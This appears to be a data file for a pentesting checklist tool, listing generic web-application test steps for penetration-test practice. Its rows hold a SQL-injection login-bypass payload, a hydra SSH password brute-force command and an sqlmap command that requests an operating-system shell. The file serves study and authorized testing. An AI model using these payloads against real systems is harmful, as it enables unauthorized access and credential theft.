// Generic Webapp Tests by Katin
//
// NOTES: 
//		statustype = BINARY, DEPTH, or NONE (case insensitive)
//		rectype = TITLE, SCAN, TOOL, SCRIPT, or EXAMINE
//
// LOAD DATA LOCAL INFILE '/path/webapp_chart.dat' INTO TABLE porttest FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n' IGNORE 9 ROWS;
//
// Cols: autoid, port, rectype, statustype, service, title, cmd, process_result_cmd, watch_file, pass_depth, order_weight
0,"80","TITLE","DEPTH","webapp","Generic webapp pentesting","http://$ip","","","0","0"
0,"80","EXAMINE","DEPTH","webapp","Examine page source code","source://$ip","Look for versions, github or downloadble source code, notes and comments, vulnerable JS libraries, etc.","","1","1"
0,"80","EXAMINE","DEPTH","webapp","SQL Injection authentication bypass","872394' or 1=1 LIMIT 1;#","Paste into username field of login form","","1","2"
0,"80","EXAMINE","BINARY","webapp","Level 1 Credentials attempts: defaults, related, common","hydra -U user-file.txt -P password-file.txt -v $ip ssh","Check for success","","1","3"
0,"80","EXAMINE","DEPTH","webapp","Burpsuite forms intercept & manipulate","burpsuite #(gui)","Try various methods","","2","1"
0,"80","TOOL","BINARY","webapp","SQLmap (disallowed on OSCP Exam)","sqlmap -r /root/Documents/Exercises/timeclock-post.txt -p "username" --dbms=mysql --risk 3 --level 5 --os-shell","For post forms, use Burpsuite to intercept a sample post to the web page with the sql injection point and save it out (e.g., timeclock-post.txt","","3","0"
0,"80","EXAMINE","DEPTH","webapp","Finding vulerabilities in PHP webapps (paper)","https://www.exploit-db.com/papers/12871","Try various techniques in the paper","","3","1"
0,"80","EXAMINE","DEPTH","webapp","The OWASP Periodic Table fo Webapp Vulnerabilities","https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities#Periodic_Table_of_Vulnerabilities","Try various approaches, research tools, and techniques","","3","2"